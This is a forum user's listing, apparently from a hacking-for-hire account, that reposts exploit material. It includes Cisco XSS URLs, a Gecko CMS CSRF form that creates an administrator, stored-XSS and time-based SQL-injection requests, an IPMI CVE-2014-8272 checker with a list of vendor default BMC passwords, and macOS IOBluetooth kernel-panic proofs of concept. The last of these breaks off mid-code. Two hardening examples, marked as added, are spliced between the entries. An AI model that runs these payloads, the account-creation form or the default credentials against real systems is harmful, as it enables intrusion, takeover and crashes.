HireHackking

Everything posted by HireHackking

  1. source: https://www.securityfocus.com/bid/47901/info

     Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

     An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials. Other attacks may also be possible.

     This issue is being tracked by Cisco Bug ID CSCtn61716.

     http://www.example.com/iptm/logicalTopo.do?clusterName=&ccmName=ed1b1"%3balert(1)//cda6137ae4c
     http://www.example.com/iptm/logicalTopo.do?clusterName=db4c1"%3balert(1)//4031caf63d7
  2. Gecko CMS 2.3 Multiple Vulnerabilities

     Vendor: JAKWEB
     Product web page: http://www.cmsgecko.com
     Affected version: 2.3 and 2.2

     Summary: Gecko CMS is the way to go, forget complicated, bloated and slow content management systems, Gecko CMS has been built to be intuitive, easy to use, extendable to almost anything, running on all standard web hosting (PHP and one MySQL database, Apache is a plus), browser compatibility and fast, super fast!

     Desc: Gecko CMS suffers from multiple vulnerabilities including Cross-Site Request Forgery, Stored and Reflected Cross-Site Scripting and SQL Injection.

     Tested on: Apache/2
                PHP/5.4.36

     Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                                 @zeroscience

     Advisory ID: ZSL-2015-5222
     Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5222.php

     27.12.2014

     ---

     CSRF Add Admin:
     ===============

     <html>
       <body>
         <form action="http://server/admin/index.php?p=user&sp=newuser" method="POST">
           <input type="hidden" name="jak_name" value="Testingus2" />
           <input type="hidden" name="jak_email" value="test2@test.test" />
           <input type="hidden" name="jak_username" value="Testusername2" />
           <input type="hidden" name="jak_usergroup" value="3" />
           <input type="hidden" name="jak_access" value="1" />
           <input type="hidden" name="jak_password" value="123123" />
           <input type="hidden" name="jak_confirm_password" value="123123" />
           <input type="hidden" name="save" value="" />
           <input type="submit" value="Submit form" />
         </form>
       </body>
     </html>

     usergroup
     4 = moderator
     3 = administrator
     2 = member standard
     1 = guest
     5 = banned

     Stored XSS (params: jak_img, jak_name, jak_url):
     ================================================

     POST http://server/admin/index.php?p=categories&sp=newcat HTTP/1.1

     jak_catparent    0
     jak_catparent2   0
     jak_footer       1
     jak_img          "><script>alert(1);</script>
     jak_lcontent     <p>test</p>
     jak_lcontent2
     jak_menu         1
     jak_name         "><script>alert(2);</script>
     jak_name2
     jak_url          "><script>alert(3);</script>
     jak_varname      ZSL
     save

     SQL Injection (params: jak_delete_log[], ssp):
     ==============================================

     POST /admin/index.php?p=logs&sp=s HTTP/1.1

     delete=&jak_delete_log%5B%5D=4%20and%20benchmark(20000000%2csha1(1))--%20&jak_delete_log%5B%5D=2&jak_delete_log%5B%5D=1

     --

     GET /admin/index.php?p=logs&sp=delete&ssp=3[SQLi] HTTP/1.1

     Reflected XSS:
     ==============

     /admin/index.php [horder%5B%5D parameter]
     /admin/index.php [jak_catid parameter]
     /admin/index.php [jak_content parameter]
     /admin/index.php [jak_css parameter]
     /admin/index.php [jak_delete_log%5B%5D parameter]
     /admin/index.php [jak_email parameter]
     /admin/index.php [jak_extfile parameter]
     /admin/index.php [jak_file parameter]
     /admin/index.php [jak_hookshow%5B%5D parameter]
     /admin/index.php [jak_img parameter]
     /admin/index.php [jak_javascript parameter]
     /admin/index.php [jak_lcontent parameter]
     /admin/index.php [jak_name parameter]
     /admin/index.php [jak_password parameter]
     /admin/index.php [jak_showcontact parameter]
     /admin/index.php [jak_tags parameter]
     /admin/index.php [jak_title parameter]
     /admin/index.php [jak_url parameter]
     /admin/index.php [jak_username parameter]
     /admin/index.php [real_hook_id%5B%5D parameter]
     /admin/index.php [sp parameter]
     /admin/index.php [sreal_plugin_id%5B%5D parameter]
     /admin/index.php [ssp parameter]
     /admin/index.php [sssp parameter]
     /js/editor/plugins/filemanager/dialog.php [editor parameter]
     /js/editor/plugins/filemanager/dialog.php [field_id parameter]
     /js/editor/plugins/filemanager/dialog.php [fldr parameter]
     /js/editor/plugins/filemanager/dialog.php [lang parameter]
     /js/editor/plugins/filemanager/dialog.php [popup parameter]
     /js/editor/plugins/filemanager/dialog.php [subfolder parameter]
     /js/editor/plugins/filemanager/dialog.php [type parameter]
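The SQL injection in the advisory above sits in `jak_delete_log[]`, an array of log IDs that the log-deletion handler evidently pastes into an `IN (...)` list unquoted. The following is an added example, not Gecko CMS code (the CMS is PHP/MySQL and its real query is not shown in the advisory): it models that pattern in Python against an in-memory SQLite table so it runs offline, with the concatenating handler next to a hardened one that validates each array element as an integer and binds it as a parameter. The advisory's `benchmark()` payload is MySQL-specific, so the payload here is a plain boolean tautology; the table name, columns and rows are constructed for the example.

```python
import sqlite3

# Constructed sample rows standing in for the CMS log table (assumed name and columns).
SAMPLE_LOGS = [(1, "login ok"), (2, "login failed"), (3, "password changed"), (4, "logout")]


def fresh_db():
    """In-memory SQLite database seeded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jak_logs (id INTEGER PRIMARY KEY, msg TEXT)")
    conn.executemany("INSERT INTO jak_logs VALUES (?, ?)", SAMPLE_LOGS)
    conn.commit()
    return conn


def remaining_ids(conn):
    """IDs still present, in order; used to observe what each handler deleted."""
    return [row[0] for row in conn.execute("SELECT id FROM jak_logs ORDER BY id")]


def delete_logs_vulnerable(conn, jak_delete_log):
    """The injectable pattern: every jak_delete_log[] value is pasted into the SQL text.

    A single element such as '4) OR (1=1' turns
        DELETE FROM jak_logs WHERE id IN (4)
    into
        DELETE FROM jak_logs WHERE id IN (4) OR (1=1)
    which empties the table.
    """
    in_list = ",".join(jak_delete_log)
    conn.execute("DELETE FROM jak_logs WHERE id IN (%s)" % in_list)
    conn.commit()
    return remaining_ids(conn)


def delete_logs_hardened(conn, jak_delete_log):
    """Validate each element as a decimal integer, then bind with '?' placeholders.

    Only the number of placeholders comes from the request; the SQL text never
    contains attacker-controlled characters.
    """
    ids = []
    for value in jak_delete_log:
        if not value.isdigit():
            raise ValueError("jak_delete_log[] must contain integer IDs only: %r" % value)
        ids.append(int(value))
    if ids:
        placeholders = ",".join("?" * len(ids))
        conn.execute("DELETE FROM jak_logs WHERE id IN (%s)" % placeholders, ids)
        conn.commit()
    return remaining_ids(conn)


def hardened_rejects(jak_delete_log):
    """True if the hardened handler refuses the input and leaves the table untouched."""
    conn = fresh_db()
    try:
        delete_logs_hardened(conn, jak_delete_log)
    except ValueError:
        return remaining_ids(conn) == [row[0] for row in SAMPLE_LOGS]
    return False


if __name__ == "__main__":
    benign = ["4", "2"]
    payload = ["4) OR (1=1"]   # adapted from the advisory's MySQL benchmark() payload
    print("vulnerable, benign :", delete_logs_vulnerable(fresh_db(), benign))
    print("vulnerable, payload:", delete_logs_vulnerable(fresh_db(), payload))
    print("hardened,   benign :", delete_logs_hardened(fresh_db(), benign))
    print("hardened,   payload: rejected =", hardened_rejects(payload))
```

The `ssp` parameter from the `GET ...&sp=delete&ssp=3[SQLi]` request is the same defect with a single scalar instead of an array; the same integer check and bound parameter apply.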
  3. """ For testing purposes only. (c) Yong Chuan, Koh 2014 """ from time import sleep from socket import * from struct import * from random import * import sys, os, argparse HOST = None PORT = 623 bufsize = 1024 recv = "" # create socket UDPsock = socket(AF_INET,SOCK_DGRAM) UDPsock.settimeout(2) data = 21 #offset of data start RMCP = ('\x06' + #RMCP.version = ASF RMCP v1.0 '\x00' + #RMCP.reserved '\xFF' + #RMCP.seq '\x07' #RMCP.Type/Class = Normal_RMCP/IPMI ) def SessionHeader (ipmi, auth_type='None', seq_num=0, sess_id=0, pwd=None): auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5} sess_header = '' sess_header += pack('<B', auth_types[auth_type]) sess_header += pack('<L', seq_num) sess_header += pack('<L', sess_id) if auth_type is not 'None': raw = pwd + pack('<L', sess_id) + ipmi + pack('<L', seq_num) + pwd import hashlib h = hashlib.md5(raw) sess_header += h.digest() sess_header += pack('B', len(ipmi)) return sess_header class CreateIPMI (): def __init__ (self): self.priv_lvls = {'Reserved':0, 'Callback':1, 'User':2, 'Operator':3, 'Admin':4, 'OEM':5, 'NO ACCESS':15 } self.priv_lvls_2 = {0:'Reserved', 1:'Callback', 2:'User', 3:'Operator', 4:'Admin', 5:'OEM', 15:'NO ACCESS'} self.auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5} def CheckSum (self, bytes): chksum = 0 q = '' for i in bytes: q += '%02X ' %ord(i) chksum = (chksum + ord(i)) % 0x100 if chksum > 0: chksum = 0x100 - chksum return pack('>B', chksum) def Header (self, cmd, seq_num=0x00): #only for IPMI v1.5 cmds = {'Get Channel Auth Capabilities' : (0x06, 0x38), #(netfn, cmd_code) 'Get Session Challenge' : (0x06, 0x39), 'Activate Session' : (0x06, 0x3a), 'Set Session Privilege Level' : (0x06, 0x3b), 'Close Session' : (0x06, 0x3c), 'Set User Access' : (0x06, 0x43), 'Get User Access' : (0x06, 0x44), 'Set User Name' : (0x06, 0x45), 'Get User Name' : (0x06, 0x46), 'Set User Password' : (0x06, 0x47), 'Get Chassis Status' : (0x00, 0x01)} 
ipmi_header = '' ipmi_header += pack('<B', 0x20) #target addr ipmi_header += pack('<B', cmds[cmd][0]<<2 | 0) #netfn | target lun ipmi_header += self.CheckSum (ipmi_header) ipmi_header += pack('<B', 0x81) #source addr ipmi_header += pack('<B', seq_num<<2 | 0) #seq_num | source lun ipmi_header += pack('<B', cmds[cmd][1]) #IPMI message command return ipmi_header def GetChannelAuthenticationCapabilities (self, hdr_seq, chn=0x0E, priv_lvl='Admin'): ipmi = '' ipmi += self.Header('Get Channel Auth Capabilities', hdr_seq) ipmi += pack('<B', 0<<7 | chn) #IPMI v1.5 | chn num (0-7, 14=current_chn, 15) ipmi += pack('<B', self.priv_lvls[priv_lvl]) #requested privilege level ipmi += self.CheckSum (ipmi[3:]) return ipmi def GetSessionChallenge (self, hdr_seq, username, auth_type='MD5'): #only for IPMI v1.5 ipmi = '' ipmi += self.Header('Get Session Challenge', hdr_seq) ipmi += pack('<B', self.auth_types[auth_type]) #authentication type ipmi += username #user name ipmi += self.CheckSum(ipmi[3:]) return ipmi def ActivateSession (self, hdr_seq, authcode, auth_type='MD5', priv_lvl='Admin'): #only for IPMI v1.5 ipmi = '' ipmi += self.Header('Activate Session', hdr_seq) ipmi += pack('>B', self.auth_types[auth_type]) ipmi += pack('>B', self.priv_lvls[priv_lvl]) ipmi += authcode #challenge string ipmi += pack('<L', 0xdeadb0b0) #initial outbound seq num ipmi += self.CheckSum(ipmi[3:]) return ipmi def SetSessionPrivilegeLevel (self, hdr_seq, priv_lvl='Admin'): #only for IPMI v1.5 ipmi = '' ipmi += self.Header('Set Session Privilege Level', hdr_seq) ipmi += pack('>B', self.priv_lvls[priv_lvl]) ipmi += self.CheckSum(ipmi[3:]) return ipmi def CloseSession (self, hdr_seq, sess_id): ipmi = '' ipmi += self.Header ("Close Session", hdr_seq) ipmi += pack('<L', sess_id) ipmi += self.CheckSum(ipmi[3:]) return ipmi def GetChassisStatus (self, hdr_seq): ipmi = '' ipmi += self.Header ("Get Chassis Status", hdr_seq) ipmi += self.CheckSum(ipmi[3:]) return ipmi def GetUserAccess (self, hdr_seq, user_id, 
chn_num=0x0E): ipmi = '' ipmi += self.Header ("Get User Access", hdr_seq) ipmi += pack('>B', chn_num) #chn_num = 0x0E = current channel ipmi += pack('>B', user_id) ipmi += self.CheckSum(ipmi[3:]) return ipmi def GetUserName (self, hdr_seq, user_id=2): ipmi = '' ipmi += self.Header ("Get User Name", hdr_seq) ipmi += pack('>B', user_id) ipmi += self.CheckSum(ipmi[3:]) return ipmi def SetUserName (self, hdr_seq, user_id, user_name): #Assign user_name to user_id, replaces if user_id is occupied ipmi = '' ipmi += self.Header ("Set User Name", hdr_seq) ipmi += pack('>B', user_id) ipmi += user_name.ljust(16, '\x00') ipmi += self.CheckSum(ipmi[3:]) return ipmi def SetUserPassword (self, hdr_seq, user_id, password, op='set password'): ops = {'disable user':0, 'enable user':1, 'set password':2, 'test password':3} ipmi = '' ipmi += self.Header ("Set User Password", hdr_seq) ipmi += pack('>B', user_id) ipmi += pack('>B', ops[op]) ipmi += password.ljust(16, '\x00') #IPMI v1.5: 16bytes | IPMI v2.0: 20bytes ipmi += self.CheckSum(ipmi[3:]) return ipmi def SetUserAccess (self, hdr_seq, user_id, new_priv, chn=0x0E): ipmi = '' ipmi += self.Header ("Set User Access", hdr_seq) ipmi += pack('<B', 1<<7 | 0<<6 | 0<<5 | 1<<4 | chn) #bit4=1=enable user for IPMI Messaging | chn=0xE=current channel ipmi += pack('>B', user_id) ipmi += pack('>B', self.priv_lvls[new_priv]) ipmi += pack('>B', 0) ipmi += self.CheckSum(ipmi[3:]) return ipmi def SendUDP (pkt): global HOST, PORT, data res = '' code = ipmi_seq = 0xFFFF for i in range(5): try: UDPsock.sendto(pkt, (HOST, PORT)) res = UDPsock.recv(bufsize) except Exception as e: print '[-] Socket Timeout: Try %d'%i sleep (0) else: #have received a reply if res[4:5] == '\x02': #Session->AuthType = MD5 data += 16 code = unpack('B',res[data-1:data])[0] ipmi_seq= unpack('B',res[data-3:data-2])[0]>>2 if res[4:5] == '\x02': data -= 16 break return code, ipmi_seq, res def SetUpSession (username, pwd, priv='Admin', auth='MD5'): global data #Get Channel 
Authentication Capabilities ipmi = CreateIPMI().GetChannelAuthenticationCapabilities(0, chn=0xE, priv_lvl=priv) code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi) if code != 0x00: return code, 0, 0, 0 #print '[+]%-30s: %02X (%d)'%('Get Chn Auth Capabilities', code, ipmi_seq) #Get Session Challenge ipmi = CreateIPMI().GetSessionChallenge(1, username, 'MD5') code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi) if code != 0x00: if code == 0xFFFF: print "[-] BMC didn't respond to IPMI v1.5 session setup" print " If firmware had disabled it, then BMC is not vulnerable" return code, 0, 0, 0 temp_sess_id = unpack('<L', res[data:data+4])[0] challenge_str = res[data+4:data+4+16] #print '[+]%-30s: %02X (%d)'%('Get Session Challenge', code, ipmi_seq) #Activate Session ipmi = CreateIPMI().ActivateSession(2, challenge_str, auth, priv) code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, auth, 0, temp_sess_id, pwd) + ipmi) if code != 0x00: return code, 0, 0, 0 data += 16 sess_auth_type = unpack('B', res[data:data+1])[0] sess_id = unpack('<L', res[data+1:data+1+4])[0] ini_inbound = sess_hdr_seq = unpack('<L', res[data+5:data+5+4])[0] sess_priv_lvl = unpack('B', res[data+9:data+9+1])[0] #print '[+]%-30s: %02X (%d)'%('Activate Session', code, ipmi_seq) #print ' %-30s: Session_ID %08X'%sess_id data -= 16 #Set Session Privilege Level ipmi = CreateIPMI().SetSessionPrivilegeLevel(3, priv) code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_hdr_seq, sess_id) + ipmi) sess_hdr_seq += 1 if code != 0x00: return code, 0, 0, 0 new_priv_lvl = unpack('B', res[data:data+1])[0] #print '[+]%-30s: %02X (%d)'%('Set Session Priv Level', code, ipmi_seq) return code, temp_sess_id, sess_hdr_seq, sess_id def CloseSession (sess_seq, sess_id): global data #Close Session ipmi = CreateIPMI().CloseSession(5, sess_id) code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi) #print '[+]%-30s: %02X (%d)'%('Close Session', 
code, ipmi_seq) return code def CheckSessionAlive(sess_seq, sess_id): #SetUserPassword(): "user enable <user_id>" ipmi = CreateIPMI().GetChassisStatus(31) code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi) print '[+] %-35s: %02X (%d)'%('CheckSessionAlive->GetChassisStatus', code, ipmi_seq) sess_seq += 1 return sess_seq def banner(): print ("######################################################\n"+\ "## This tool checks whether a BMC machine is vulnerable to CVE-2014-8272\n"+\ "## (http://www.kb.cert.org/vuls/id/843044)\n"+\ "## by logging the TemporarySessionID/SessionID in each IPMI v1.5 session,\n"+\ "## and checking that these values are incremental\n"+\ "## \n"+\ "## Author: Yong Chuan, Koh\n"+\ "## Email: yongchuan.koh@mwrinfosecurity.com\n"+\ "## (c) Yong Chuan, Koh 2014\n"+\ "######################################################\n") def main(): banner() #default usernames/passwords (https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi) vendors = {"HP" :{"user":"Administrator", "pwd":""}, #no default pwd: <factory randomized 8-character string> "DELL" :{"user":"root", "pwd":"calvin"}, "IBM" :{"user":"USERID", "pwd":"PASSW0RD"}, "FUJITSU" :{"user":"admin", "pwd":"admin"}, "SUPERMICRO" :{"user":"ADMIN", "pwd":"ADMIN"}, "ORACLE" :{"user":"root", "pwd":"changeme"}, "ASUS" :{"user":"admin", "pwd":"admin"} } arg = argparse.ArgumentParser(description="Test for CVE-2014-8272: Use of Insufficiently Random Values") arg.add_argument("-i", "--ip", required=True, help="IP address of BMC server") arg.add_argument("-u", "--udpport", nargs="?", default=623, type=int, help="Port of BMC server (optional: default 623)") arg.add_argument("-v", "--vendor", nargs="?", help="Server vendor of BMC (optional: for default BMC credentials)") arg.add_argument("-n", "--username", nargs="?", default=None, help="Username of BMC account (optional: for non-default credentials)") arg.add_argument("-p", 
"--password", nargs="?", default=None, help="Password of BMC account (optional: for non-default credentials)") args = arg.parse_args() if args.vendor is not None: args.vendor = args.vendor.upper() if (args.vendor is None or args.vendor not in vendors.keys()) and (args.username is None or args.password is None): print "[-] Error: -n and -p are required because -v is not specified/in default list" print " Vendors with Default Accounts" print " -----------------------------------" for vendor,acct in vendors.iteritems(): print " %s: username='%s', password='%s'"%(vendor,acct["user"],acct["pwd"]) sys.exit(1) if args.username is None: args.username = vendors[args.vendor]["user"].ljust(16, '\x00') if args.password is None: args.password = vendors[args.vendor]["pwd"].ljust(16, '\x00') global HOST, PORT HOST = args.ip PORT = args.udpport print "Script Parameters" print "-------------------------" print "IP : %s"%HOST print "Port : %d"%PORT print "Username : %s"%args.username print "Password : %s"%args.password session_ids = [] for i in xrange(0x80): #do not go beyond 0xFF, because of how session_ids is checked for incremental later try: code, temp_sess_id, sess_seq, sess_id = SetUpSession (args.username, args.password, priv='Admin', auth='MD5') if code == 0: session_ids.append(temp_sess_id) session_ids.append(sess_id) print '[+%04X] temp_sess_id=%08X, sess_id=%08X'%(i, temp_sess_id, sess_id) else: #print '[-%04X] SetUp Session: Trying again after timeout 5s'%(i) sleep(5) continue code = CloseSession (sess_seq, sess_id) if code == 0: #print '[+%04X] Close Session OK'%(i) i += 1 sleep (0.5) else: #print '[-%04X] Close Session fail: Wait for natural timeout (60+/-3s)'%(i) sleep(65) except Exception as e: exc_type, exc_obj, exc_tb = sys.exc_info() fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1] print (exc_type, fname, exc_tb.tb_lineno) session_ids = session_ids[:0xFF] #get the first incremental diff const_diff = None for i in xrange(1, len(session_ids)): if 
session_ids[i-1] < session_ids[i]: const_diff = session_ids[i] - session_ids[i-1] break #check if session_ids are increasing at a fixed value vulnerable = True crossed_value_boundary = 0 for i in xrange(1, len(session_ids)): if session_ids[i]-session_ids[i-1] != const_diff: if crossed_value_boundary < 2: crossed_value_boundary += 1 else: vulnerable = False if vulnerable: print "Conclusion: BMC is vulnerable to CVE-2014-8272" else: print "Conclusion: BMC is not vulnerable to CVE-2014-8272" if __name__ == "__main__": main()
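The tool above assembles IPMI v1.5 packets by hand and decides the BMC is affected when successive session IDs count up by a fixed step. The following added example (not the author's code) shows the same wire format in Python 3 with both IPMI checksums verified on parse, plus a stand-alone version of the predictability check that tolerates a few off-step deltas from other clients opening sessions in between. The BMC reply is constructed inline; nothing is sent on the network, and the reply's capability bytes are made-up values for the demonstration.

```python
"""IPMI v1.5 over RMCP: message construction, response parsing, and the
session-ID predictability check behind the CVE-2014-8272 test.

Added example, not the original tool. All packets are constructed inline.
"""
import struct
from collections import Counter

RMCP_HEADER = b"\x06\x00\xff\x07"   # ASF RMCP v1.0, reserved, seq 0xFF, class = IPMI
AUTH_NONE = 0
NETFN_APP = 0x06
CMD_GET_CHANNEL_AUTH_CAPS = 0x38
BMC_SLAVE_ADDR = 0x20               # rsAddr: the BMC
REMOTE_SW_ID = 0x81                 # rqAddr: remote console software ID
SESSION_HDR_LEN = 10                # auth(1) + seq(4) + session id(4) + payload len(1)


def ipmi_checksum(data):
    """IPMI two's-complement checksum: (sum(data) + checksum) % 256 == 0."""
    return (-sum(data)) & 0xFF


def build_ipmi_request(netfn, cmd, payload=b"", rq_seq=0):
    """IPMI/LAN message: rsAddr, netFn/rsLUN, cks1, rqAddr, rqSeq/rqLUN, cmd, data, cks2."""
    hdr = bytes([BMC_SLAVE_ADDR, (netfn << 2) | 0])
    hdr += bytes([ipmi_checksum(hdr)])
    body = bytes([REMOTE_SW_ID, (rq_seq << 2) | 0, cmd]) + payload
    return hdr + body + bytes([ipmi_checksum(body)])


def build_ipmi_response(netfn, cmd, completion_code, data=b"", rq_seq=0):
    """Response mirror of build_ipmi_request: addresses swap, netFn = request netFn + 1."""
    hdr = bytes([REMOTE_SW_ID, ((netfn | 1) << 2) | 0])
    hdr += bytes([ipmi_checksum(hdr)])
    body = bytes([BMC_SLAVE_ADDR, (rq_seq << 2) | 0, cmd, completion_code]) + data
    return hdr + body + bytes([ipmi_checksum(body)])


def build_session_packet(ipmi_msg, seq=0, session_id=0):
    """RMCP header + IPMI v1.5 session header with auth type 'none' (no authcode field)."""
    sess = struct.pack("<BLLB", AUTH_NONE, seq, session_id, len(ipmi_msg))
    return RMCP_HEADER + sess + ipmi_msg


def get_channel_auth_caps_request(channel=0x0E, priv_level=4):
    """Get Channel Authentication Capabilities, asked the v1.5 way (bit 7 clear); 4 = Admin."""
    payload = bytes([(0 << 7) | channel, priv_level])
    return build_session_packet(build_ipmi_request(NETFN_APP, CMD_GET_CHANNEL_AUTH_CAPS, payload))


def parse_session_response(pkt):
    """Split an unauthenticated IPMI v1.5 response and verify both checksums.

    Raises ValueError for anything that is not a well-formed packet.
    """
    if len(pkt) < 4 + SESSION_HDR_LEN or pkt[:4] != RMCP_HEADER:
        raise ValueError("not an RMCP/IPMI packet")
    auth_type, sess_seq, sess_id, length = struct.unpack_from("<BLLB", pkt, 4)
    if auth_type != AUTH_NONE:
        raise ValueError("authenticated session header not handled here")
    msg = pkt[4 + SESSION_HDR_LEN:4 + SESSION_HDR_LEN + length]
    if len(msg) != length or length < 8:
        raise ValueError("truncated IPMI message")
    if ipmi_checksum(msg[:2]) != msg[2]:
        raise ValueError("bad header checksum")
    if ipmi_checksum(msg[3:-1]) != msg[-1]:
        raise ValueError("bad data checksum")
    return {
        "session_seq": sess_seq,
        "session_id": sess_id,
        "netfn": msg[1] >> 2,
        "rq_seq": msg[4] >> 2,
        "cmd": msg[5],
        "completion_code": msg[6],
        "data": msg[7:-1],
    }


def packet_is_valid(pkt):
    """True if parse_session_response accepts the packet (both checksums good)."""
    try:
        parse_session_response(pkt)
        return True
    except ValueError:
        return False


def session_ids_predictable(ids, tolerated_breaks=2):
    """True when successive session IDs advance by one constant step (mod 2^32).

    That is the CVE-2014-8272 condition: a counter where a random value is
    required. The step is the most common delta; a few other deltas are
    tolerated because other clients may open sessions between two samples.
    """
    if len(ids) < 8:
        raise ValueError("need at least eight session IDs for a meaningful verdict")
    deltas = [(b - a) & 0xFFFFFFFF for a, b in zip(ids, ids[1:])]
    step, _ = Counter(deltas).most_common(1)[0]
    breaks = sum(1 for d in deltas if d != step)
    return step != 0 and breaks <= tolerated_breaks


if __name__ == "__main__":
    print("request :", get_channel_auth_caps_request().hex())
    # Constructed BMC reply: channel 0x0E, auth-type byte 0x14 (MD5 + straight password), cc 0
    reply = build_session_packet(build_ipmi_response(
        NETFN_APP, CMD_GET_CHANNEL_AUTH_CAPS, 0x00, b"\x0e\x14\x16\x00\x00\x00\x00\x00"))
    print("response:", parse_session_response(reply))
    print("counter :", session_ids_predictable([0x0200a801 + 0x100 * i for i in range(8)]))
```

The request bytes after the session header come out as `20 18 c8 81 00 38 0e 04 35`, the same frame ipmitool sends for this command with rqSeq 0, which is a quick way to cross-check a hand-rolled encoder against a packet capture.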
  4. /*
      * crash-issue2.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick.
      *
      * Triggers a panic overwriting a stack_canary.
      *
      * gcc -Wall -o crash-issue2{,.c} -framework IOKit
      *
      */

     #include <stdio.h>
     #include <stdlib.h>
     #include <string.h>
     #include <mach/mach.h>
     #include <mach/vm_map.h>
     #include <IOKit/IOKitLib.h>

     struct BluetoothCall {
       uint64_t args[7];
       uint64_t sizes[7];
       uint64_t index;
     };

     int main(void) {
       /* Finding vuln service */
       io_service_t service =
         IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController"));
       if (!service) {
         return -1;
       }

       /* Connect to vuln service */
       io_connect_t port = (io_connect_t) 0;
       kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
       IOObjectRelease(service);
       if (kr != kIOReturnSuccess) {
         return kr;
       }

       printf(" [+] Opened connection to service on port: %d\n", port);

       /* Zero the unused argument slots so only args[0..1] reach the kernel */
       struct BluetoothCall a;
       memset(&a, 0, sizeof(a));

       a.sizes[0] = 0x1000;
       a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char));

       /* This argument overflows a local buffer and the adjacent stack canary */
       a.sizes[1] = 264;
       a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char));
       memset((void *)a.args[1], 'A', a.sizes[1]);

       /* Call IOBluetoothHCIUserClient::DispatchHCIReadLocalName() */
       a.index = 0x2d;

       /* Debug */
       for(int i = 0; i < 120; i++) {
         if(i % 8 == 0) printf("\n");
         printf("\\x%02x", ((unsigned char *)&a)[i]);
       }
       printf("\n");
       fflush(stdout);

       kr = IOConnectCallMethod((mach_port_t) port,      /* Connection */
                                (uint32_t) 0,            /* Selector */
                                NULL, 0,                 /* input, inputCnt */
                                (const void*) &a,        /* inputStruct */
                                sizeof(a),               /* inputStructCnt */
                                NULL, NULL, NULL, NULL); /* Output stuff */

       printf("kr: %08x\n", kr);

       return IOServiceClose(port);
     }
  5. /*
      * crash-issue1.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick.
      *
      * Exploits a missing check in
      * IOBluetoothHCIUserClient::DispatchHCICreateConnection() causing a panic.
      *
      * gcc -Wall -o crash-issue1{,.c} -framework IOKit
      */

     #include <stdio.h>
     #include <stdlib.h>
     #include <string.h>
     #include <mach/mach.h>
     #include <mach/vm_map.h>
     #include <IOKit/IOKitLib.h>

     #define SIZE 0x1000

     struct BluetoothCall {
       uint64_t args[7];
       uint64_t sizes[7];
       uint64_t index;
     };

     int main(void) {
       /* Finding vuln service */
       io_service_t service =
         IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController"));
       if (!service) {
         return -1;
       }

       /* Connect to vuln service */
       io_connect_t port = (io_connect_t) 0;
       kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
       IOObjectRelease(service);
       if (kr != kIOReturnSuccess) {
         return kr;
       }

       printf(" [+] Opened connection to service on port: %d\n", port);

       struct BluetoothCall a;
       int i;
       for (i=0; i<7; i++) {
         a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
         a.sizes[i] = SIZE;
       }

       /* This value causes IOMalloc() to fail */
       a.args[6] = 0x0;
       a.sizes[6] = 0x80000041;

       a.index = 0x06; /* DispatchHCICreateConnection() */

       for(i = 0; i < 120; i++) {
         if(i % 8 == 0) printf("\n");
         printf("\\x%02x", ((unsigned char *)&a)[i]);
       }
       printf("\n");

       kr = IOConnectCallMethod((mach_port_t) port,      /* Connection */
                                (uint32_t) 0,            /* Selector */
                                NULL, 0,                 /* input, inputCnt */
                                (const void*) &a,        /* inputStruct */
                                120,                     /* inputStructCnt */
                                NULL, NULL, NULL, NULL); /* Output stuff */

       printf("kr: %08x\n", kr);

       return IOServiceClose(port);
     }
  6. /*
      * crash-issue3.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick.
      *
      * Exploits a missing check in
      * IOBluetoothHCIController::TransferACLPacketToHW() to trigger a panic.
      *
      * gcc -Wall -o crash-issue3{,.c} -framework IOKit
      *
      */

     #include <stdio.h>
     #include <stdlib.h>
     #include <string.h>
     #include <mach/mach.h>
     #include <mach/vm_map.h>
     #include <IOKit/IOKitLib.h>

     struct BluetoothCall {
       uint64_t args[7];
       uint64_t sizes[7];
       uint64_t index;
     };

     int main(void) {
       /* Finding vuln service */
       io_service_t service =
         IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController"));
       if (!service) {
         return -1;
       }

       /* Connect to vuln service */
       io_connect_t port = (io_connect_t) 0;
       kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
       IOObjectRelease(service);
       if (kr != kIOReturnSuccess) {
         return kr;
       }

       printf(" [+] Opened connection to service on port: %d\n", port);

       struct BluetoothCall a;
       memset(&a, 0, sizeof(a));

       a.sizes[0] = 0x1000;
       a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char));

       a.sizes[1] = 0x1000;
       a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char));
       memset((void *)a.args[1], 0x22, 0x1000);

       /* Call DispatchHCISendRawACLData() */
       a.index = 0x63;

       /* Debug */
       for(int i = 0; i < 120; i++) {
         if(i % 8 == 0) printf("\n");
         printf("\\x%02x", ((unsigned char *)&a)[i]);
       }
       printf("\n");
